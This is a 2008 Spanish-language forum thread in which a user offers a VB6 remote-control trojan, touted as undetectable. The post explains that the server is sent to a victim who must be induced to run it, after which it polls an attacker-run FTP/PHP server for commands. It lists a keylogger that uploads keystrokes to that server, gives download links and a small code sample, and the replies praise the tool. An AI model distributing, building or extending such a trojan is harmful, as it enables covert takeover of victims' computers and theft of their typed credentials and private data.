elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Troyano PHP sin conexion por IP - 100% indetectable (codigo fuente vb6)
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Troyano PHP sin conexion por IP - 100% indetectable (codigo fuente vb6)  (Leído 10,380 veces)
inix3000

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Troyano PHP sin conexion por IP - 100% indetectable (codigo fuente vb6)
« en: 22 Julio 2008, 11:34 am »

Buenas a todos, e desarrollado un troyano en vb6 el cual permite conectarse a el servidor de la victima sin necesidad de saber su direccion ip, unicamente hace falta enviar el servidor a la victima y acer que lo ejecute. Para permitir ocultarlo a vustro gusto osdejo el codigo fuente de el servidor y de el cliente y asi podeis añadir nuevas funciones ya  que las que e puesto no son demasiadas.

INDETECTABLE 100% - nuevo metodo de conexion!

Funcionamiento de ControladoraPC y Requerimientos

El troyano consta de dos aplicaciones, un server y un cliente, el cliente lo usaremos para manejar el server el cual estará en el PC de la víctima.
Para poder conectarnos con el servidor a la víctima, unicamente tendrémos que enviar el server a la víctima y conseguir que la ejecute.

Se requiere un servidor FTP con soporte PHP como:

El troyano funciona de la sigiente manera, nosotros tenemos un archivo llamado "main.ini" en nuestro servidor FTP, el server cada cierto tiempo lee el archivo ini y coloca los datos
en TextBox's. El server tiene una funcion llamada FunX en la que programando en VB podremos poner el siguiente code:

'Ejemplo sacado del proyecto: Encender y Apagar PC
If Text2.Text = "PC/On" Then
Shell "C:\windows\system32\cmd.exe cmd /c Shutdown -a"
End If
If Text2.Text = "PC/Off" Then
Shell "C:\windows\system32\cmd.exe cmd /c Shutdown -s -t 60"
End If


Lo que provocara que al indicar el archivo main.ini "PC/On" se ejecutara la acción de apagado del equipo; y al indicar "PC/Off" se cancelará el apagado. El archivo main.ini se puede editar facilmente gracias a dos cosas, al programa Cliente y al archivo edit_main.php.


Funciones Actuales (se le pueden añadir mas facilmente, no tngo tiempo xD)

Apagar el equipo y cancelar el apagado
Activar y desactivar el administrador de tareas
Abrir y cerrar la disquetera de CD
Ocultar o mostrar la barra de tareas
Ocultar o mostrar el boton de inicio
Ocultar o mostrar el escritorio
Ocultar o mostrar el reloj
Activar y desactivar KeyLogger
Activar y desactivar la subida de las teclas capturadas por KeyLogger a servidor FTP


DESCARGA:
Servidor -> http://www.megaupload.com/?d=LNJSG9QS
Cliente -> http://www.megaupload.com/?d=EOSO7HD3

CAPTURAS:
http://img88.imageshack.us/img88/9906/serveruu4.jpg
http://img88.imageshack.us/img88/1808/codigovb6zl5.jpg
http://img160.imageshack.us/img160/1815/demo2xa3.jpg
http://img88.imageshack.us/img88/903/demotareasoffcj0.jpg
http://img88.imageshack.us/img88/7439/demotareasonku4.jpg


« Última modificación: 22 Julio 2008, 15:32 pm por inix3000 » En línea

invisible_hack


Desconectado Desconectado

Mensajes: 978


Invisible_Hack™ Nick Registrado ^^


Ver Perfil WWW
Re: Troyano PHP sin conexion por IP - 100% indetectable (codigo fuente vb6)
« Respuesta #1 en: 22 Julio 2008, 11:38 am »

Muy bien, parece muy completo y tentador...pero...¿podrías poner unas capturas de pantalla, por favor?

Saludos, gracias  ;D


En línea

"Si no visitas mi blog, Chuck te dará una patada giratoria"
inix3000

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Troyano PHP sin conexion por IP - 100% indetectable (codigo fuente vb6)
« Respuesta #2 en: 22 Julio 2008, 15:33 pm »

Código:
invisible_hack

Muy bien, parece muy completo y tentador...pero...¿podrías poner unas capturas de pantalla, por favor?

Saludos, gracias  ;D

capturas añadidas
En línea

Zeroql


Desconectado Desconectado

Mensajes: 957


Todo lo k sucede sucede por una razon


Ver Perfil WWW
Re: Troyano PHP sin conexion por IP - 100% indetectable (codigo fuente vb6)
« Respuesta #3 en: 22 Julio 2008, 18:22 pm »

interesante el programita
te felicito por tu azaña.
En línea

Dime y lo olvido, enseñame y lo recuerdo, involucrame y lo aprendo.
/.-ZEROQL.-\   -----  #937675#

‭‭‭‭jackl007


Desconectado Desconectado

Mensajes: 1.403


[UserRPL]


Ver Perfil WWW
Re: Troyano PHP sin conexion por IP - 100% indetectable (codigo fuente vb6)
« Respuesta #4 en: 27 Julio 2008, 20:35 pm »

MINIMO DEBERIAS DARME LOS CREDITOS NO?


este proyecto lo invente yo,y le di el nombre de 'Troyano Satelital' lo postee hace casi un año, veo que le has agregado mas funciones ...
les deje la idea..

esta bien, vale tu esfuerzo, felizmnte das el codigo fuente, esa es la idea.

si alguien queire mas informacion: softdown.tk
(la pagina esta desactualizadisima, pero alli estaba ese proyecto)

Saludos!

jackl007
« Última modificación: 27 Julio 2008, 20:40 pm por jackl007 ツ » En línea

JmHk

Desconectado Desconectado

Mensajes: 36


San google EL MEJOR!!!!!!!


Ver Perfil
Re: Troyano PHP sin conexion por IP - 100% indetectable (codigo fuente vb6)
« Respuesta #5 en: 28 Julio 2008, 04:18 am »

Buen programa  ;D
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
El autor del troyano Exobot vende el código fuente
Noticias
wolfbcn 0 1,138 Último mensaje 23 Enero 2018, 02:51 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines